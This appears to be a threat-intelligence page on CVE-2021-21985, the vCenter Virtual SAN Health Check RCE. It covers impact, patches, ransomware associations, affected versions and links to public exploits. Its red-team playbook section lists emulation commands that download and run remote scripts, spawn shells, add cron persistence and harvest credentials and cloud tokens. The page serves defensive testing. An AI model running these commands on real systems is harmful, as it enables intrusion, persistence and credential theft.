CVE-2021-21985
Overview
This vulnerability is a remote code execution flaw caused by improper input validation within the Virtual SAN Health Check plug-in of the vSphere Client (HTML5). The root cause lies in the failure to sanitize user-supplied data processed by the plug-in, which is enabled by default in VMware vCenter Server. The affected component is the Virtual SAN Health Check plug-in accessible via the vSphere Client interface on port 443.
Vulnerability Description
The vSphere Client (HTML5) contains a remote code execution vulnerability due to lack of input validation in the Virtual SAN Health Check plug-in which is enabled by default in vCenter Server. A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server.
Impact
An unauthenticated attacker with network access to the vCenter Server's port 443 can execute arbitrary commands with unrestricted privileges on the host operating system. This enables full system compromise, including potential data theft, service disruption, or lateral movement within the network. No user interaction or credentials are required, increasing the ease of exploitation and severity of impact on business operations.
Solution
Apply the patches provided by VMware as outlined in advisory VMSA-2021-0010, which addresses this vulnerability in VMware vCenter Server 6.5 and VMware Cloud Foundation. Detailed patching instructions and updates are available at https://www.vmware.com/security/advisories/VMSA-2021-0010.html. VMware recommends updating affected systems to the fixed versions and disabling the Virtual SAN Health Check plug-in if immediate patching is not feasible.
EPSS vs KEV Prediction — Evolution (30 days)
Ransomware Intelligence
Predictions
Predictions are based on analysis of past ransomware group behaviors and their predilection for specific vulnerability characteristics, such as vendor, product, and flaw type.
The groups below are predictions based on historical exploitation patterns of the same vendor/product. These are not confirmations.
Full Analysis
The vulnerability in the vSphere Client (HTML5) arises from inadequate input validation within the Virtual SAN Health Check plug-in, which is enabled by default in the vCenter Server. This flaw allows a malicious actor with network access to port 443 to execute arbitrary commands on the underlying operating system with unrestricted privileges. The lack of proper input validation means that an attacker can manipulate the input to the plug-in, potentially leading to remote code execution. This vulnerability is particularly critical given the elevated privileges it grants, which can compromise the entire vCenter Server environment and the virtual machines managed by it.
Attack vectors for this vulnerability are primarily network-based, as an attacker only needs access to the vCenter Server's management interface. Exploitation can occur through crafted requests sent to the vulnerable plug-in, allowing the attacker to execute arbitrary code. Scenarios may include an attacker targeting a poorly secured network where vCenter Server is exposed to the internet or an internal network with insufficient segmentation. Once exploited, the attacker could install malware, exfiltrate sensitive data, or disrupt operations by altering or deleting virtual machines, leading to significant operational disruptions.
The real-world impact of this vulnerability is substantial, particularly for organizations relying on VMware's virtualization solutions. The potential for remote code execution means that an attacker could gain full control over the vCenter Server, leading to unauthorized access to all virtual machines and their data. This could result in data breaches, loss of critical business operations, and damage to the organization's reputation. The financial implications could be severe, including costs associated with incident response, recovery, and potential regulatory penalties if sensitive data is compromised.
Detection of this vulnerability can be challenging due to its nature, as it may not generate obvious alerts or logs during exploitation. Organizations should implement network monitoring to detect unusual traffic patterns directed at the vCenter Server, particularly on port 443. Regular vulnerability scanning and penetration testing can also help identify potential weaknesses in the environment. Additionally, maintaining an up-to-date inventory of software and applying security patches promptly is crucial to mitigating risks associated with known vulnerabilities.
To mitigate the risks posed by this vulnerability, organizations should consider several strategies. First, it is essential to disable the Virtual SAN Health Check plug-in if it is not in use, thereby eliminating the attack surface. Implementing strict network segmentation can also help limit access to the vCenter Server, ensuring that only authorized personnel can interact with it. Furthermore, organizations should adopt a robust patch management policy to ensure that all software components are regularly updated to address known vulnerabilities. By combining these strategies, organizations can significantly reduce their risk exposure and enhance their overall security posture against potential exploitation.
CSURFACE threat intelligence has detected a slight increase in exploitation attempts targeting CVE-2021-21985, reflected by a modest uptick in telemetry signals. This subtle rise indicates continued interest from threat actors, particularly those linked to ransomware operations such as the Akira group, underscoring the vulnerability’s persistent attractiveness as an initial access vector. While the overall exploit trend remains stable without rapid escalation, the emergence of additional proof-of-concept exploits on public platforms broadens the potential for opportunistic attackers to leverage this flaw. Consequently, the risk profile for organizations running affected VMware vCenter Server instances remains elevated, with adversaries maintaining capabilities to execute remote code with high privileges. Defenders should remain vigilant as this vulnerability continues to be a viable target within the current threat landscape.
Update 2 — July 03, 2026
CSURFACE threat intelligence has detected a slight increase in exploitation attempts targeting CVE-2021-21985, reflecting a modest uptick in adversary activity leveraging this critical VMware vCenter Server vulnerability. This change coincides with the continued public availability and diversification of proof-of-concept exploits, which lowers the technical barrier for threat actors to conduct remote code execution attacks. Although the overall exploitation trend remains stable without rapid escalation, the incremental rise in detections signals persistent interest from ransomware-associated groups such as Akira, underscoring the vulnerability’s ongoing appeal as an initial access vector. This evolving landscape reinforces the sustained risk posture for organizations running affected vCenter Server instances, as attackers maintain and potentially expand their operational capabilities to exploit this flaw with high privileges.
Affected Products (53)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Vmware | Vcenter Server | 6.5 |
cpe:2.3:a:vmware:vcenter_server:6.5:-:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 6.5 |
cpe:2.3:a:vmware:vcenter_server:6.5:a:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 6.5 |
cpe:2.3:a:vmware:vcenter_server:6.5:b:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 6.5 |
cpe:2.3:a:vmware:vcenter_server:6.5:c:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 6.5 |
cpe:2.3:a:vmware:vcenter_server:6.5:d:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 6.5 |
cpe:2.3:a:vmware:vcenter_server:6.5:e:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 6.5 |
cpe:2.3:a:vmware:vcenter_server:6.5:f:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 6.5 |
cpe:2.3:a:vmware:vcenter_server:6.5:update1:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 6.5 |
cpe:2.3:a:vmware:vcenter_server:6.5:update1b:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 6.5 |
cpe:2.3:a:vmware:vcenter_server:6.5:update1c:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 6.5 |
cpe:2.3:a:vmware:vcenter_server:6.5:update1d:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 6.5 |
cpe:2.3:a:vmware:vcenter_server:6.5:update1e:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 6.5 |
cpe:2.3:a:vmware:vcenter_server:6.5:update1g:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 6.5 |
cpe:2.3:a:vmware:vcenter_server:6.5:update2:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 6.5 |
cpe:2.3:a:vmware:vcenter_server:6.5:update2b:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 6.5 |
cpe:2.3:a:vmware:vcenter_server:6.5:update2c:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 6.5 |
cpe:2.3:a:vmware:vcenter_server:6.5:update2d:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 6.5 |
cpe:2.3:a:vmware:vcenter_server:6.5:update2g:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 6.5 |
cpe:2.3:a:vmware:vcenter_server:6.5:update3:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 6.5 |
cpe:2.3:a:vmware:vcenter_server:6.5:update3d:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
VMware vCenter Server Virtual SAN Health Check Plugin RCE
exploits/linux/http/vmware_vcenter_vsan_health_rce
|
Ricter Z, wvu | Unknown | unix, linux | View |
GitHub PoCs (10)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
alt3kx/CVE-2021-21985_PoC
|
alt3kx | 213 | 49 | 2021-05-29 | View |
|
xnianq/cve-2021-21985_exp
cve-2021-21985 exploit
|
xnianq | 115 | 36 | 2021-06-03 | View |
|
testanull/Project_CVE-2021-21985_PoC
|
testanull | 29 | 5 | 2021-06-05 | View |
|
daedalus/CVE-2021-21985
CVE-2021-21985 vmware 6.7-9.8 RCE
|
daedalus | 2 | 4 | 2021-06-04 | View |
|
sknux/CVE-2021-21985_PoC
VMWARE VCENTER SERVER VIRTUAL SAN HEALTH CHECK PLUG-IN RCE (CVE-2021-21985)
|
sknux | 3 | 1 | 2021-11-09 | View |
|
onSec-fr/CVE-2021-21985-Checker
CVE-2021-21985 Checker.
|
onSec-fr | 2 | 1 | 2021-06-01 | View |
|
bigbroke/CVE-2021-21985
Multiple vulnerabilities in the vSphere Client (HTML5) were privately reported to VMware. Updates and workarounds are av...
|
bigbroke | 1 | 0 | 2021-05-27 | View |
|
haidv35/CVE-2021-21985
|
haidv35 | 1 | 0 | 2021-07-08 | View |
|
mauricelambert/CVE-2021-21985
This script check the CVE-2021-21985 vulnerability and patch on vCenter Server.
|
mauricelambert | 0 | 1 | 2021-06-01 | View |
|
aristosMiliaressis/CVE-2021-21985
cve-2021-21985 powershell poc
|
aristosMiliaressis | 0 | 0 | 2021-07-11 | View |
Threat Feed
19 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability. Tools: Advanced IP Scanner, Advanced Port Scanner, AnyDesk, Bloodhound, Cloudflared (1529 known victims)
Ransomware group known to exploit this vulnerability. Tools: Advanced IP Scanner, Advanced Port Scanner, AnyDesk, Bloodhound, Cloudflared (1529 known victims)
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Proof-of-concept code is publicly available for this vulnerability
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-664 | Server Side Request Forgery |
44%
|
High | High |
Red Team Playbook
47 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
echo "#{command}" > /etc/cron.d/#{cron_script_name}
echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name}
echo "#{command}" > /etc/cron.daily/#{cron_script_name}
echo "#{command}" > /etc/cron.hourly/#{cron_script_name}
echo "#{command}" > /etc/cron.monthly/#{cron_script_name}
echo "#{command}" > /etc/cron.weekly/#{cron_script_name}
crontab -l > /tmp/notevil
echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron}
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (5)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2021-21985 |
| vmware.com |
GitHub CVE
x_refsource_MISC
|
https://www.vmware.com/security/advisories/VMSA-2021-0010.html |
| packetstormsecurity.com |
GitHub CVE
x_refsource_MISC
|
http://packetstormsecurity.com/files/162812/VMware-Security-Advisory-2021-0010.html |
| packetstormsecurity.com |
GitHub CVE
x_refsource_MISC
|
http://packetstormsecurity.com/files/163487/VMware-vCenter-Server-Virtual-SAN-Health-Check-Remote-Code-Execution.html |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2021-21985 |